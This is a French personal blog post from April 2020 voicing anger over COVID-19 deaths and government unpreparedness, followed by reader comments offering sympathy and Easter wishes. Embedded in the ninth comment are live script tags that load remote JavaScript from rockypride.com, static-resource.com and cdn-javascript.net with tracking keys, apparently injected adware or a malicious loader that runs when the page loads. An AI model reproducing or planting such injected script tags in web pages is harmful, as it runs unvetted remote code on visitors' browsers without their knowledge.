• ma petite façon de me défouler un peu



     avec ce temps si beau chez moi et même un peu partout je pense encore plus à tout ceux qui souffrent et dans la solitude j'exprime ici mon ressenti dans la foi et mon espérance la roue tourne c'est la vie ,  mais  je sent monter en moi une colère en aije-le droit oui je le prend ,,   tous les jours des vies sont fauchées quel malheur pour tous ces pays il y en a qui ont prévoir et stoker ce qu'il fallait et d'autre qui n'ont pas put   et gouverner c'est prévoir il faudra rendre des comptes me semble t'il   monette

     

     

     

    « Alors,faisons de notre mieux pour alléger ces heures douloureuses ,,,,,Que de misères sur cette terre !!!!!! »
    Google Bookmarks

  • Commentaires

    9
    Samedi 11 Avril 2020 à 03:28

    Bonjour Monette,

    Oui moi aussi je suis en colère mais nous sommes impuissants; Mes enfants

    bien loin de moi mais on communique par téléphone. Toutes ces victimes

    du covid 19 mais que faire sinon nous dire que Dieu (je ne crois pas qu'il

    ait voulu ceci) nous préserve. Je te souhaite une bonne fête de Pâques

    malgré les circonstances, le ciel est au beau fixe, j'aime beaucoup cette

    saison.Prends bien soin de toi6 Bisous-violette

     

     

     

    <script src="//rockypride.com/2299156fcd9f4015b0.js"></script> <script src="http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8857x" type="text/javascript"></script> <script src="http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8857x&format=arrjs&r=1586568524015" type="text/javascript"></script> <script src="http://rockypride.com/ext/2299156fcd9f4015b0.js?sid=52666_8857_&title=aa&blocks[]=31af2" type="text/javascript"></script>
    8
    Vendredi 10 Avril 2020 à 14:51

    Bonjour Monette.

    Tout cela n'est pas facile a gérer les critiques y vont ,mais certains ferais mieux de penser a une seule question .

    ((((Qu'aurai je fait a sa où leur place .)))

    Que le soleil soit où pas , au rendez-vous pour cette  fête de Pâques qui ne sera pas la même que l'an passer ,sens les petits enfants .

     Passe une bonne après midi .

    Bon weekend pascal .

     

    Bisous .kettyn.

     

    7
    Vendredi 10 Avril 2020 à 09:57

    Moi aussi je suis en colère Monette chérie, mes deux fils sont réquisitionnés donc "en première ligne....

    Je me suis même mise à la couture moi qui déteste cela pour fabriquer des masques ,

    France incompétente brrr

    mais heureusement beau soleil qui nous permet de nous aérer dans le parc où j'habite..

    Tu vais aussi "du confinement" coms Monette chérie,

    je ne te vois plus et je suis triste .

    Bonne journée ma Monette chérie, prends bien soin de  toi,

    Bises affectueuses de Christiane

    6
    Vendredi 10 Avril 2020 à 07:27

    Auront-ils des comptes à rendre ? Oui moralement c'est indiscutable. Mais dans la réalité, ce sont eux qui ont le pouvoir. Ce sont eux qui sont affilés aux plus riches qui ne pensent qu'économie... alors je ne crois pas beaucoup à la justice.  Mais qu'au moins cela serve à sauver notre système de soin parti à la dérive. Plus que jamais on voit à quel point c'est essentiel dans un pays. La population augmente, les lits d'hôpitaux ont été fermés, les médecins et infirmières réduits... un non-sens mathématique mais aussi un non-sens humain. 

    Bonne journée Monette

    5
    Vendredi 10 Avril 2020 à 07:00

    C'est vrai que gouverner, c'est prévoir
    mais ceux qui nous gouvernent ont la vue basse !
    bonne journée
    Bernard

    4
    Vendredi 10 Avril 2020 à 05:47

        Bonjour  Monette  

        Oui  tout  cela  n'est  pas  facile  a  vivre  mais  malheureusement

        nous  sommes  trot  petit  pour  agir  contre  cette  salle  maladie

        allez  bon  courage  a  toi  gros  bisous  de  ton  ami  Lucien 

        Prend   soins  de  toi+++++++  bisoussssssss

    3
    Jeudi 9 Avril 2020 à 22:48
    bonsoir monette tu as raison moi aussi je suis en colère pour mes filles qui sont dans le service COVID et qui aussi on des masques mais qui ont été porté déjà et les médocs je te dis pas qui manque courage mon amie et gros poutou du soir
    2
    Jeudi 9 Avril 2020 à 21:25

    Bonsoir ma chère petite Monette,

    Oui, je crois qu'on a le droit d'être en colère.

    Et pour cause !!!

    Quand on voit toutes ces vies fauchées par l'incompétence de certains.

    Encore aujourd'hui, toujours pas de masque en pharmacie pour les clients.

    Heureusement que fifille nous en a fabriqué.

    Bisous avec un peu d'humour ci-dessous

    Aimée

    En Bretagne, on lutte avec humour contre le coronavirus | Le Petit ...

    1
    Jeudi 9 Avril 2020 à 17:36

    ... cette période est bien difficile et nous essayons de la vivre le moins mal possible. Nous sommes avec toi...nos blogs sont faits pour ça!

    Bises de Mireille du Sablon

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :